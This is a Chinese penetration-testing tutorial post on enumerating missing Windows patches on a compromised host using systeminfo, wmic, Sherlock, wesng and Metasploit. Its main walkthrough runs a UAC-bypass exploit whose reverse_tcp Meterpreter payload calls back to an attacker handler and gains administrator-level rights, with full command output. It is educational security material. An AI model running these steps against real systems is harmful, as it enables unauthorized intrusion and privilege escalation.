【内网学习笔记】14、发现主机缺失补丁
0、前言
在内网中,往往所有主机打补丁的情况都是相似的,因此在拿下一台主机权限后,可以通过查看当前主机打补丁的情况,从而找到漏洞利用点,进而进行接下来的横向、提权等操作。
1、手工发现缺失补丁
systeminfo
直接运行 systeminfo 命令,在「修补程序」(英文:Hotfix(s) )处可以看到已安装的补丁。
C:\Users\teamssix> systeminfo
……内容过多,此处省略……
修补程序: 安装了 2 个修补程序。[01]: KB2999226[02]: KB976902
……内容过多,此处省略……
wmic
运行以下命令,同样可以看到当前系统打补丁的情况,显示的信息比 systeminfo 更详细直观。
wmic qfe get Caption,Description,HotfixID,InstalledOn
C:\Users\teamssix>wmic qfe get Caption,Description,HotfixID,InstalledOnCaption Description HotFixID InstalledOn
http://support.microsoft.com/?kbid=2999226 Update KB2999226 11/26/2020
http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010
知道了系统安装了哪些补丁,也就能反推出系统可能存在的漏洞了。
2、自动发现缺失补丁
Sherlock 脚本
Sherlock 是一个在 Windows 下能够快速发现目标系统可能存在可被用于提权的漏洞的 PowerShell 脚本。
Sherlock 项目地址:https://github.com/rasta-mouse/Sherlock
导入脚本
Import-Module .\Sherlock.ps1
Sherlock 命令
Find-ALLVulns 搜索所有未安装的补丁
Find-MS16032 搜索单个漏洞
Metasploit
在已经获取到目标会话后,比如这里的会话 Seesion ID 为 1,使用 post/windows/gather/enum_patches 模块可直接查看当前系统补丁信息。
msf6 exploit(multi/handler) > use post/windows/gather/enum_patchesmsf6 post(windows/gather/enum_patches) > set session 1
session => 1msf6 post(windows/gather/enum_patches) > run
[+] KB2999226 installed on 11/26/2020
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed
或者使用 MSF 发现目标可用提权漏洞,然后进行提权
首先查看下当前会话权限
msf6 post(windows/gather/enum_patches) > sessions 1
[*] Starting interaction with 1...meterpreter > execute -if "whoami /groups"
Process 3048 created.
Channel 6 created.组信息
-----------------组名 类型 SID 属性
====================================== ====== ============ ==============================
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Administrators 别名 S-1-5-32-544 只用于拒绝的组
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE 已知组 S-1-5-4 必需的组, 启用于默认, 启用的组
控制台登录 已知组 S-1-2-1 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Mandatory Level 标签 S-1-16-8192 必需的组, 启用于默认, 启用的组
可以看到当前权限为 Medium Mandatory Level,即普通权限
我们使用 post/multi/recon/local_exploit_suggester 模块检测下当前系统可利用的提权漏洞
meterpreter > background
[*] Backgrounding session 1...msf6 post(windows/gather/enum_patches) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run[*] 172.16.214.4 - Collecting local exploits for x86/windows...
[*] 172.16.214.4 - 38 exploit checks are being tried...
[+] 172.16.214.4 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[*] Post module execution completed
可以看到提示存在 exploit/windows/local/bypassuac_eventvwr 模块可被利用
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_eventvwr
[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.101.22.38:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 172.16.214.4
[*] Meterpreter session 2 opened (10.101.22.38:4444 -> 172.16.214.4:49160) at 2021-07-06 15:38:08 +0800
[*] Cleaning up registry keys ...meterpreter > execute -if "whoami /groups"
Process 3048 created.
Channel 1 created.组信息
-----------------组名 类型 SID 属性
==================================== ====== ============ ==========================================
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Administrators 别名 S-1-5-32-544 必需的组, 启用于默认, 启用的组, 组的所有者
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE 已知组 S-1-5-4 必需的组, 启用于默认, 启用的组
控制台登录 已知组 S-1-2-1 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组
Mandatory Label\High Mandatory Level 标签 S-1-16-12288 必需的组, 启用于默认, 启用的组
可以看到,使用 exploit/windows/local/bypassuac_eventvwr 模块直接将目标权限提升到了 High Mandatory Level,即管理员权限,这里可以说 MSF 很方便了。
wesng
wesng 被称为 Windows Exploit Suggester 的下一代,wesng 和 Windows Exploit Suggester 的使用方法基本一致,但 wesng 所支持的操作系统更丰富,不过实测 wesng 还未支持 Windows 11 『手动狗头』
wesng 的安装方法也很简单
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python wes.py --update
使用起来也很简单,直接在目标主机上运行以下命令,将 systeminfo 的信息保存到 txt 中。
systeminfo > info.txt
直接使用 wesng 即可
python wes.py info.txt
使用 wesng 可以直接看到目标主机可能存在的 CVE 漏洞,从而便于我们有针对性的利用这些漏洞。
原文链接:
https://teamssix.com/year/210706-155005.html参考文章:
https://cloud.tencent.com/developer/article/1043370
https://blog.csdn.net/nathan8/article/details/108804056
更多信息欢迎关注我的微信公众号:TeamsSix
【内网学习笔记】14、发现主机缺失补丁相关推荐
- 内网学习笔记 | SSH 隧道使用
前言 SSH 全称 Secure Shell,从它的名字来看这个协议就比较安全.SSH 协议是一种应用层协议,支持几乎所有 UNIX.Linux 平台. 得益于 SSH 协议在传输过程中都是加密,所 ...
- 【内网学习笔记】24、SPN 的应用
0.前言 SPN Windows 域环境是基于微软的活动目录服务工作的,它在网络系统环境中将物理位置分散.所属部门不同的用户进行分组和集中资源,有效地对资源访问控制权限进行细粒度的分配,提高了网络环境 ...
- 【内网学习笔记】21、哈希传递与票据传递
1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...
- 【内网学习笔记】10、ew 的使用
1.Socks 代理工具介绍 Socks 代理可以理解成升级版的 lcx,关于 lcx 的用法可以看我之前的文章: https://teamssix.com/year/210528-130449.ht ...
- 【内网学习笔记】9、iodine 使用
1.介绍 iodine 这个名字起的很有意思,iodine 翻译过来就是碘,碘的原子序数为 53,53 也就是 DNS 服务对应的端口号. iodine 和 dnscat2 一样,适合于其他请求方式被 ...
- 【内网学习笔记】20、Hashcat 的使用
1.介绍 Hashcat 是一款用于破解密码的工具,据说是世界上最快最高级的密码破解工具,支持 LM 哈希.MD5.SHA 等系列的密码破解,同时也支持 Linux.Mac.Windows 平台. 工 ...
- 【内网学习笔记】22、PsExec 和 WMI 的使用
1.PsExec PsExec.exe PsExec 在之前的文章里提到过一次,参见https://teamssix.com/210802-181052.html,今天来着重学习一下. PsExec ...
- 内网渗透笔记——二层发现
一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...
- 【内网学习笔记】5、BloodHound 的使用
1.介绍 BloodHound 使用可视化图形显示域环境中的关系,攻击者可以使用 BloodHound 识别高度复杂的攻击路径,防御者可以使用 BloodHound 来识别和防御那些相同的攻击路径.蓝 ...
- 【内网学习笔记】19、IPC 与计划任务
0.前言 在多层代理的环境中,由于网络限制,通常采用命令行的方式连接主机,这里学习下 IPC 建立会话与配置计划任务的相关点. 1.IPC IPC (Internet Process Connecti ...
最新文章
- 将CSDN600W用户及密码帐号存入本地MySql数据库
- openstack的vnc启动ssl
- java 杭州专卖店_杭州JAVA哪家有名气
- 5.5 用户定义的可调用类型
- 解决为什么已经设置了request.setCharacterEncoding(“utf-8“);POST请求仍然乱码的问题
- [2]Selenium学习系列---- FirePath的安装和使用
- axure rp10安装教程,axurerp10安装步骤
- 【LDC1314】电感传感器中文手册与检测原理介绍
- [ Linux驱动炼成记 ] 12 -音频驱动TAS5754添加EQ参数
- 海湾gst5000协议号_海湾GST5000控制器说明书(DEMO)预案.doc
- Element-UI 上传图片到达一定数量后隐藏图片上传按钮
- Google首页电吉他Doodle源代码
- 正则表达式判断移动号码
- Illegal unquoted character ((CTRL-CHAR, code 10)): has to be escaped using backslash to be included
- APP下载量成空洞,留住用户最关键
- NVIDIA JETSON AGX XAVIER DEVELOPER KIT刷机教程(各种踩雷篇)
- Java 中怎么打印数组?
- 【MySQL】数据类型
- 机械工程基础知识点汇总
- Brainstorm (头脑风暴)软件
热门文章
- 加强版CycleGAN!贾佳亚等提出卡通图与真实人脸转换模型,看女神突破次元壁长啥样...
- Kali Linux 下搜狗输入法换肤和设置快捷键
- UltraCompare Professional Version 7.20.0.1009 注册码
- 浪潮服务器bios设置 改硬盘接口,bios设置中更改硬盘接口模式为ide的方法
- 亚洲前沿科技展望:人工智能与区块链的融合发展
- matlab画正态分布图简单算法
- Azure云服务器搭建
- 2021年互联网热梗盘点
- Java获取本周一、上周一、下周一时间
- 小心 transmittable-thread-local 的这个坑